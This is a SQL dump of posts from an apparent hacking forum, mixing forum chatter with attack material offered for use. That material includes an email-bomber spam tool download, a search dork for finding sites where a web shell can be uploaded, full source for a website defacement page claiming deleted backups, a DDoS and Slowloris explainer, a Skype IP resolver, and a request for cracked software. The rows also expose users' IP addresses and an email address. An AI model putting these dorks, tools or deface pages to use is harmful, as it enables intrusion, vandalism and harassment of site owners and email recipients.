http://www.woodger.ca/jv_top.htm http://www.webdeveloper.com/java/java_pr...ds_up.html http://javaboutique.internet.com/ http://java.sun.com/developer/onlineTrai...index.html http://www.codeproject.com/KB/java/ http://www.info4java.com/ http://www.beginner-java-tutorial.com/ http://www.javapassion.com/javaintro/ http://java.sun.com/new2java/index.jsp http://www.webpelican.com/internet-programming-1/ http://home.cogeco.ca/~ve3ll/jatutor0.htm http://www.cafeaulait.org/ http://java.sun.com/developer/onlineTraining/rmi/ http://www.onjava.com/pub/a/onjava/excer...index.html http://netbeans.org/kb/articles/learn-java.html http://java.sun.com/docs/books/tutorial/java/index.html http://www.freejavaguide.com/ Credit to YourMomIsFat', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e1e4dbd0cb1f664021c52c1b0771d49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2524', '504', '2520', '7', 'RE: Almost there!', '0', '82', 'iTzIpod', '1348460965', 'Going to post some threads later on today.. Not now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5a40e1a90e649b80992356ed23c1566', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2525', '506', '0', '18', '[NEW]T3RMIN8OR\'S B0MB3R[NEW]', '0', '4', 'Triple H', '1348461205', '[u][color=#32CD32]Features:[/color][/u] [spoiler]+You can send mails from Gmail. +You can send mails from Hotmail. +It\'s reliable & quite fast. +Easy to use (Noob friendly).[/spoiler] [u][color=#32CD32]Screenshot\'s[/color]:[/u] [spoiler][URL=http://imageshack.us/photo/my-images/829/tab1l.png/][IMG]http://img829.imageshack.us/img829/7425/tab1l.png[/IMG][/URL] [URL=http://imageshack.us/photo/my-images/268/tab2o.png/][IMG]http://img268.imageshack.us/img268/2903/tab2o.png[/IMG][/URL] [URL=http://imageshack.us/photo/my-images/716/tab3s.png/][IMG]http://img716.imageshack.us/img716/6475/tab3s.png[/IMG][/URL] Uploaded with [URL=http://imageshack.us]ImageShack.us[/URL][/spoiler] [u][color=#32CD32]Virus scan [color=#FF6347]2[/color]/[color=#32CD32]42[/color][/color]:[/u] [spoiler][url=http://www.virustotal.com/file-scan/report.html?id=c0358cb58c2118de60e24b911172bebbf90e6a163715d10af1a51176c61d50fd-1308498289]Virus Total[/url] [url=http://vscan.novirusthanks.org/analysis/d5cffa744359a7a9e69ae73533649c1d/bmV3LXN1cGVyLWJvbWJlci1leGU=/]No Virus Thanks[/url] Well I don\'t know why but all my VB projects are detected as these following ones that are found. Weird?[/spoiler] [u][color=#32CD32]The Download File[/color]:[/u] [spoiler][url=http://adf.ly/1uHfj]Mediafire[/url][/spoiler] Please appreciate my work, even thou its not the best spammer/bomber, If people like it, it will actually encourage me to do more things on VB and then share it with Ubers. Also if more people comment appreciating my work. [u][color=#32CD32]More updates might come up[/color]:[/u] [spoiler]+Add Attachments to mails. +Tell how many mails you want to send. +A progress bar. +Send anonymous mails (Possibly)[/spoiler] Hope you guys like it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ecca087e1fd625221b9a863fe77c8b90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2526', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '4', 'Triple H', '1348461403', 'They aren\'t bad but look old school.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b46ed6c010dfb9b68c6e8907ee46b33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2527', '507', '0', '13', 'New dork on vulnerabilities and view files', '0', '4', 'Triple H', '1348461744', 'Any websites url ending with the dork below will allow you to upload your shell and some sites will allow you to view their FTP files. [b]Dork[/b] [quote] main/upload [/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '18950d118391e972ae8b22f3c9d249a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2528', '504', '2520', '7', 'RE: Almost there!', '0', '4', 'Triple H', '1348463915', 'I\'m sure jok3r is happy L0L, it has been a long journey from 0 stats to 2K posts and 500 threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ead3cb63c76a4fb5d0077d976a77edad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2529', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348473570', 'It\'s alright, i will do a few userbars when I got the time. I\'m currently busy with my job and my girlfriend is taking all my free time but once I\'m free I will work on it. Any color you would like? Or you just want to see what looks best? also should I go back with the old icon, i\'m really out of ideas because you never like my fonts xD', '46.189.247.20', '784201492', '1', '0', '62', '1348492808', '1', 'ffd99946b17057f84a173147b790bc11', '0', '1348492808'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2530', '503', '2512', '3', 'RE: Ridiculous Downtime and Awards', '0', '61', 'NXK', '1348496037', '[quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '301a509452544a2db242e0b9df38fbe9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2533', '474', '2287', '25', 'RE: What antivirus you have?', '0', '61', 'NXK', '1348498123', 'I use my brain and online scanners. I barley ever download any .exe anyways. It\'s really easy to see a virus since 90% of people spreading make it blatent that it\'s a virus.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '0dcf5ade7133e705a5a1062f17e07252', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2534', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1348498444', 'Global warming is a result of increasing temperature of earth\'s atmosphere due to several factors that can be natural or man made. Whatever may be the factors the effect of global warming is not in favour of mankind and hence need to be controlled. The main reason behind global warming is the increase in the concentration of greenhouse gases in the atmosphere due to green house effect. Green house effect leads to increase in the temperature of earth by trapping the sun\'s heat and light in the earth\'s atmosphere. In this phenomenon the heat and light of sun enters the atmosphere but cannot go out as they are trapped in earth\'s atmosphere by the green house gases and thus resulting in temperature rise. The green house gases like carbon dioxide, methane, and nitrous oxide plays the major role in green house effect and excessive emission of these gases through various means is a major cause of global warming. Another important reason for global warming is large amounts of carbon dioxide produced from burning of fossil fuels for the different purposes especially for power generation in various power plants. Due to burning of large amount of coal in power plant excessive amount of carbon dioxide is emitted in different forms in the atmosphere. In addition to that, countless number of vehicles running in the road today is one of the major source of emission of a large amount of carbon dioxide in the atmosphere leading to increase in the temperature of earth\'s atmosphere. Methane is another green house gas that results in global warming to a large extent. Methane can be easily obtained from rice paddies, bovine flatulence, bacteria in bogs and fossil fuel manufacture and hence easily available in abundance. Moreover, it is 20 times as effective as Carbon dioxide at entrapping heat in the atmosphere and is a leading cause of global warming. Similarly, another green house gas called nitrous oxide and chlorofluorocarbons or CFCs is also responsible for the global warming. Nitrous oxide has 300 times more capacity of trapping heat than carbon dioxide while chlorofluorocarbons have heat-trapping potential thousands of times greater than carbon dioxide. Another major cause of global warming is continuous cutting of a large number of trees across the world that is also referred as deforestation. It is projected that, 34 million acres of trees are cut and burned each ear resulting in 25% of all carbon dioxide release entering the atmosphere. Increasing population is another cause of global warming that cannot be neglected. As human being is known to exhale carbon dioxide means more population will lead to more emission of carbon dioxide in the atmosphere resulting in increase in the level of carbon dioxide in the atmosphere and thus resulting in global warming. Huge copy and paste from a project.. I promise I wasn\'t copy/pasting assignments!', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'f7d4f4b7f8b875db71789c1b1aab87a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2535', '474', '2533', '25', 'RE: What antivirus you have?', '0', '1', 't3h jok3r', '1348507189', '[quote=\'NXK\' pid=\'2533\' dateline=\'1348498123\'] I use my brain and online scanners. I barley ever download any .exe anyways. It\'s really easy to see a virus since 90% of people spreading make it blatent that it\'s a virus. [/quote] LOL I agree plus I use sandboxie which helps even more. I make sure I upload all the files on virustotal because if they aren\'t viruses and aren\'t crypted then there wouldn\'t be problem if uploaded on virustotal.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09b75f32a99d0ddeb5e3194687ff0b1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2537', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348516032', 'Damn I didn\'t know that the myawards plugin was that famous. I will try my best.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1ba3c378bb3a46be8de1e88c8a42fbd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2538', '508', '0', '13', 'Awesome deface page source + PSD', '0', '8', 'spacefish36', '1348516579', 'First I will give you the PSD for the FBI Logo http://www.mediafire.com/?p86a6e7pjadthag And now for the page source :) [code] <html> <head> <title>HACKED - By Boss</title> </head><span style=\"cursor: url(\'http://cur.cursors-4u.net/cursors/images10/cur938.gif\')\"> <body bgcolor=\"000000\"> <center> <iframe width=\"1\" height=\"1\" src=\"http://youtube.googleapis.com/v/m8p_A5KrwGc&autoplay=1\" frameborder=\"0\" allowfullscreen></iframe> <p><font color=\"red\" face=\"calibri\"> <img src=\"http://cdn1.iconfinder.com/data/icons/Iconshock_vista_hallowen/256/head.png\" width=\"37\" height=\"37\"><marquee width=\"300\"><strong>DONT BE MAD BRO! WE EAT SKIDS FOR BREAKFAST!</strong></marquee> <img src=\"http://cdn1.iconfinder.com/data/icons/Iconshock_vista_hallowen/256/head.png\" width=\"37\" height=\"37\"> </p> <p> <b> <font size=\"7\" face=\"calibri\"> <script> // make changes here! var text=\"HACKED BY BOSS\" var speed=7 // Do Not Alter Code Below if (document.all||document.getElementById){ document.write(\'<span id=\"highlight\">\' + text + \'</span>\') var storetext=document.getElementById? document.getElementById(\"highlight\") : document.all.highlight } else document.write(text) var hex=new Array(\"00\",\"14\",\"28\",\"3C\",\"50\",\"64\",\"78\",\"8C\",\"A0\",\"B4\",\"C8\",\"DC\",\"F0\") var r=1 var g=1 var b=1 var seq=1 function changetext(){ rainbow=\"#\"+hex[r]+hex[g]+hex[b] storetext.style.color=rainbow } function change(){ if (seq==6){ b-- if (b==0) seq=1 } if (seq==5){ r++ if (r==12) seq=6 } if (seq==4){ g-- if (g==0) seq=5 } if (seq==3){ b++ if (b==12) seq=4 } if (seq==2){ r-- if (r==0) seq=3 } if (seq==1){ g++ if (g==12) seq=2 } changetext() } function starteffect(){ if (document.all||document.getElementById) flash=setInterval(\"change()\",speed) } starteffect() </script> </font></b> </p> <p> <img src=\"http://i50.tinypic.com/2ik60jn.jpg\" width=\"220\" height=\"200\"> <!-- ARE YOU MAD BRO? YOU SEEM MAD LOL I CAN SEE YOU! YOUR SO CUTE! --> <p> <font color=\"red\" face=\"calibri\"> [] DEFACED BY Boss (credit to: GMPRO) [] </p> <p> [] EMAIL: blunt@live.com [] </p> <p> [] BACKUPS DELETED! [] </p> <p> [] ADMINS ALL HACKED [] </p> <p> [] SECURE YOUR SHIT NEXT TIME! [] </p> <script type=\'text/javascript\'> // <![CDATA[ function initCursor() { if (document.getElementById) { var i, rats, rlef, rdow; for (var i=0; i<sparkles; i++) { var rats=createDiv(3, 3); rats.style.visibility=\"hidden\"; document.body.appendChild(tiny[i]=rats); starv[i]=0; tinyv[i]=0; var rats=createDiv(5, 5); rats.style.backgroundColor=\"transparent\"; rats.style.visibility=\"hidden\"; var rlef=createDiv(1, 5); var rdow=createDiv(5, 1); rats.appendChild(rlef); rats.appendChild(rdow); rlef.style.top=\"2px\"; rlef.style.left=\"0px\"; rdow.style.top=\"0px\"; rdow.style.left=\"2px\"; document.body.appendChild(star[i]=rats); } set_width(); sparkle(); }} var hex=new Array(\"00\",\"14\",\"28\",\"3C\",\"50\",\"64\",\"78\",\"8C\",\"A0\",\"B4\",\"C8\",\"DC\",\"F0\") var r=1 var g=1 var b=1 var seq=1 var sparkles = 35; var x=ox=400; var y=oy=300; var swide=800; var shigh=600; var sleft=sdown=0; var tiny=new Array(); var star=new Array(); var starv=new Array(); var starx=new Array(); var stary=new Array(); var tinyx=new Array(); var tinyy=new Array(); var tinyv=new Array(); function sparkle() { var c; if (x!=ox || y!=oy) { ox=x; oy=y; for (c=0; c<sparkles; c++) if (!starv[c]) { star[c].style.left=(starx[c]=x)+\"px\"; star[c].style.top=(stary[c]=y)+\"px\"; star[c].style.clip=\"rect(0px, 5px, 5px, 0px)\"; star[c].style.visibility=\"visible\"; starv[c]=50; break; } } for (c=0; c<sparkles; c++) { if (starv[c]) update_star(c); if (tinyv[c]) update_tiny(c); } setTimeout(\"sparkle()\", 40); } function update_star(i) { if (--starv[i]==25) star[i].style.clip=\"rect(1px, 4px, 4px, 1px)\"; if (starv[i]) { stary[i]+=1+Math.random()*3; if (stary[i]<shigh+sdown) { star[i].style.top=stary[i]+\"px\"; starx[i]+=(i%5-2)/5; star[i].style.left=starx[i]+\"px\"; } else { star[i].style.visibility=\"hidden\"; starv[i]=0; return; } } else { tinyv[i]=50; tiny[i].style.top=(tinyy[i]=stary[i])+\"px\"; tiny[i].style.left=(tinyx[i]=starx[i])+\"px\"; tiny[i].style.width=\"2px\"; tiny[i].style.height=\"2px\"; star[i].style.visibility=\"hidden\"; tiny[i].style.visibility=\"visible\" } } function update_tiny(i) { if (--tinyv[i]==25) { tiny[i].style.width=\"1px\"; tiny[i].style.height=\"1px\"; } if (tinyv[i]) { tinyy[i]+=1+Math.random()*3; if (tinyy[i]<shigh+sdown) { tiny[i].style.top=tinyy[i]+\"px\"; tinyx[i]+=(i%5-2)/5; tiny[i].style.left=tinyx[i]+\"px\"; } else { tiny[i].style.visibility=\"hidden\"; tinyv[i]=0; return; } } else tiny[i].style.visibility=\"hidden\"; } document.onmousemove=mouse; function mouse(e) { set_scroll(); y=(e)?e.pageY:event.y+sdown; x=(e)?e.pageX:event.x+sleft; } function set_scroll() { if (typeof(self.pageYOffset)==\"number\") { sdown=self.pageYOffset; sleft=self.pageXOffset; } else if (document.body.scrollTop || document.body.scrollLeft) { sdown=document.body.scrollTop; sleft=document.body.scrollLeft; } else if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) { sleft=document.documentElement.scrollLeft; sdown=document.documentElement.scrollTop; } else { sdown=0; sleft=0; } } window.onresize=set_width; function set_width() { if (typeof(self.innerWidth)==\"number\") { swide=self.innerWidth; shigh=self.innerHeight; } else if (document.documentElement && document.documentElement.clientWidth) { swide=document.documentElement.clientWidth; shigh=document.documentElement.clientHeight; } else if (document.body.clientWidth) { swide=document.body.clientWidth; shigh=document.body.clientHeight; } } function createDiv(height, width) { var div=document.createElement(\"div\"); rainbow=\"#\"+hex[r]+hex[g]+hex[b] if (seq==6){ b-- if (b==0) seq=1 } if (seq==5){ r++ if (r==12) seq=6 } if (seq==4){ g-- if (g==0) seq=5 } if (seq==3){ b++ if (b==12) seq=4 } if (seq==2){ r-- if (r==0) seq=3 } if (seq==1){ g++ if (g==12) seq=2 } div.style.position=\"absolute\"; div.style.height=height+\"px\"; div.style.width=width+\"px\"; div.style.overflow=\"hidden\"; div.style.zIndex=\"10\"; div.style.backgroundColor=rainbow; return (div); } window.onload=function() { initCursor() initImage() startTime() } function initImage() { imageId = \'menu\' image = document.getElementById(imageId); setOpacity(image, 0); image.style.visibility = \"visible\"; fadeIn(imageId,0); } function fadeIn(objId,opacity) { if (document.getElementById) { obj = document.getElementById(objId); if (opacity <= 100) { setOpacity(obj, opacity); opacity += 10; window.setTimeout(\"fadeIn(\'\"+objId+\"\',\"+opacity+\")\", 120); } } } function setOpacity(obj, opacity) { opacity = (opacity == 100)?99.999:opacity; // IE/Win obj.style.filter = \"alpha(opacity:\"+opacity+\")\"; // Safari<1.2, Konqueror obj.style.KHTMLOpacity = opacity/100; // Older Mozilla and Firefox obj.style.MozOpacity = opacity/100; // Safari 1.2, newer Firefox and Mozilla, CSS3 obj.style.opacity = opacity/100; } function changeNav(id) { document.getElementById(\'content\').innerHTML=document.getElementById(id).innerHTML; document.getElementById(\'main\').innerHTML=document.getElementById(\'home\').innerHTML; document.getElementById(\'rabbit\').style.top=\"275px\" document.getElementById(\'penguin\').style.top=\"532px\" } function hidestatus(){ window.status=\"\" return true } // ]]> </script> <script type=\"text/javascript\"> if (window.jstiming) window.jstiming.load.tick(\'headEnd\'); </script> <div class=\'navbar section\' id=\'navbar\'><div class=\'widget navbar\' id=\'navbar1\'><script type=\"text/javascript\"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener(\"load\", function(){ object[attribute] = val; }, false); } else { window.attachEvent(\'onload\', function(){ object[attribute] = val; }); } } function showRelatedContent(args) { var el = document.getElementById(\'related-iframe\'); if (el.parentNode.style.display != \'none\') { el.parentNode.style.display = \'none\'; document.onclick = showRelatedContent.prevOnClick; return; } var match = /(?:^[?]|&)c=([0-9]+)(?:&|(?!.))/.exec(args); if (match !== null) { document.getElementById(\'related-loading\').style.left = match[1] + \'px\'; el.style.left = Math.max(0, match[1] - parseInt(el.width) / 2) + \'px\'; } el.src = \"http://www.blogger.com\" + \'/related-content.g?q=\' + window.location.href + \'&id=\' + \"7792698363959436653\"; el.parentNode.style.display = \'block\'; showRelatedContent.prevOnClick = document.onclick; // Hide related-content dropdown when clicking anywhere but on it. document.onclick = function() { var el = document.getElementById(\'related-iframe\'); if (el.parentNode.style.display != \'none\') { el.parentNode.style.display = \'none\'; } document.onclick = showRelatedContent.prevOnClick; }; } </script> <SCRIPT TYPE=\"text/javascript\"> <!-- //Disable right click script //visit http://www.rainbow.arch.scriptmania.com/scripts/ var message=\"U MAD BRO?\"; /////////////////////////////////// function clickIE() {if (document.all) {(message);return false;}} function clickNS(e) {if (document.layers||(document.getElementById&&!document.all)) { if (e.which==2||e.which==3) {(message);return false;}}} if (document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} document.oncontextmenu=new Function(\"return false\") // --> </SCRIPT> </p> </body> </font> </html> [/code] Enjoy it :) Thanks to Mr407', '72.231.24.165', '1223104677', '0', '0', '1', '1351917694', '1', '807e1605f67b316cbbae76a15f43a2fb', '0', '1351917694'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6953', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1351917913', 'I want my name and l33thacking', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '885e80561a05bb04004771be73451267', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6954', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351917954', 'i will take cs4 or cs3. Can i get a non survey link plz?', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '75a1fff3501a54a8062b2320cb843a13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2539', '509', '0', '21', 'The world of DDoS Attacks', '0', '8', 'spacefish36', '1348516722', '[align=center]Welcome to the world of DDoS attacks, I am sure you have seen these, herd of these, experienced these ect. Now I am going to take you into how they work. First thing we are going to talk about is the \"4 layer DDoS attack\" which is the most common type of DDoS attack which is when many attackers hit a target at the same time. This is usually done with easy access tools such as the \"Low Orbit Ion Cannon\" or \"Command Prompt\" this is just basically sending thousands of packets per second to a target, and flooding the server until it goes down. This is a very weak kind of attack if using it by yourself, but with 100\'s or thousands of people all doing it at the same time it is very effective. Next type of attack I will be discussing is the \"Layer 7 DDoS Attack\" this is more advanced, how this works is instead of just constantly sending packets to the server you send it an HTTP get request but if you just send part of it and not the other half, so the server is expecting the other half wich ties up most of the server this is also called the \"Slowloris\" attack, with this you can freeze a server up very quickly, the most famous person who uses these attacks is th3j35t3r who is said to be able to hold off sites with a 3g cellphone. I will post more later cause I am tired of typing lol so yea, I will probably update this later List of information on DDoS attacks: http://www.youtube.com/watch?v=1EAnjZqXK9E http://infosecisland.com/blogview/10394-...ained.html http://www.prolexic.com/gad-north-americ...7QodgggAlQ http://antivirus.about.com/od/whatisavir...ttacks.htm http://www.youtube.com/watch?v=3bDX7uXm0V0[/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b64ca7c13de4fb79ebea3918bcf8f07b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2540', '510', '0', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '8', 'spacefish36', '1348517164', '[align=center]I thought I\'d share this source with you but this does not come with the api, you have to use your own API. I cannot really afford to share it :s [url=http://bronyboard.net/skyperd/RBD%27s%20Skype%20Resolver%20%5BPublic%5D.zip]Download Here[/url] Enjoy the source it was coded by Hardcore smasher [/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b9a116099a386768531a25f2e0f73cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2541', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348518043', 'Lol t3h jok3r. Well I\'m pretty sure you know I\'m a post whore, a rep whore, and an awards whore. Or you should\'ve known... I wish the Awards Plugin could be back on now.. :/ But I don\'t wanna rush it since like I want something that is working and took time to make instead of something that was rushed and all. :p OT: Awards Plugin is a huge impact (good) on the forum :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1601a460a84bb809165bde34715e3db3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2542', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348518083', 'Awards Plugin Copied for a post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9968aa1837b232c99e48126c0af148a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2543', '510', '2540', '19', 'RE: Rbd\'s Skype Resolver Source', '0', '82', 'iTzIpod', '1348520446', 'Can you add a Virus Scan?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99db00833465bd2ea8c51e885bafef6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2544', '511', '0', '5', 'New forums suggestions', '0', '1', 't3h jok3r', '1348523222', 'I\'m planning on adding some more coding and computing sections. What sections do you think should be added.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8e2cbb7504ea0e79f40323c75b8414f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2545', '512', '0', '30', 'Roadkil.Net´s Tool Collection', '0', '5', 'Timmy', '1348523647', 'I found this site already like a year ago and were impressed by it and the owner uploaded more and more tools and today i want to share the site with those who don\'t know it.... [align=center][img]http://www.roadkil.net/images/logo.png[/img] [/align] This site contains alot of really nice and HQ Tools, below i will create short list with links to these tools. All rights belongs to the site owner of roadkil.net, the thread gets instantly deleted if he wants so. [align=center][b]Roadkil\'s Disk Wipe[/b][/align] Securely erases the contents of a disk replacing it with random data or leaving the drive completely blank. Numerous passes can be performed to ensure data is totally unrecoverable. Program works on hard and floppy disks aswell as USB/Flash drives. Download: http://www.roadkil.net/program.php/P14/Disk%20Wipe [align=center][b]Roadkil\'s Boot Builder[/b][/align] Boot builder allows you to create your own custom boot sector from scratch. This utility allows you to recreate or restore boot sectors lost due to virus or other damage to a drive. Boot sectors can be imported/exported to a disk or created from a template. This program supports FAT and NTFS boot sector types. Download: http://www.roadkil.net/program.php/P3/Boot%20Builder [align=center][b]Roadkil\'s Undelete[/b][/align] Allows you to undelete files that you have accidentally deleted from your drives. Download: http://www.roadkil.net/program.php/P28/Undelete [align=center][b]Roadkil\'s Window Message[/b][/align] Displays information about the window the mouse pointer is currently over. Displays the windows handle, size and the owner thread information. Useful for people writting windows applications or wanting to create an interface to another application such as macros/scripts. Download: http://www.roadkil.net/program.php/P30/Window%20Message [align=center][b]Roadkil\'s Audit[/b][/align] Creates a database of computers on your network and their configurations. Allows you to track what applications are installed across your network for license auditing purposes. A great help for large networks trying to ensure they are legitimate. Audit also provides a great way of determining which computers in your network require hardware upgrades or software installations. Download: http://www.roadkil.net/program.php/P2/Audit [align=center][b]Roadkil\'s Error List[/b][/align] Displays information relating to a windows error code. Allows you to determine what the error message given by an application actually means. The programming definition of the error is also given so coders can create a handler for them in their application. Download: http://www.roadkil.net/program.php/P15/Error%20List [align=center][b]Roadkil\'s Monitor Test[/b][/align] Displays test patterns for use when performing monitor repairs. Displays pure colours and white screens for colour tuning or finding missing colours, grid lines for focusing and setting the image dimensions correctly. A must for any monitor repair person or checking the quality of a monitors display. Download: http://www.roadkil.net/program.php/P20/Monitor%20Test source: http://www.roadkil.net/ A big thanks to the hoster, please support him.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '24fe4ffacfe54db702fa7d501e7fcc40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES 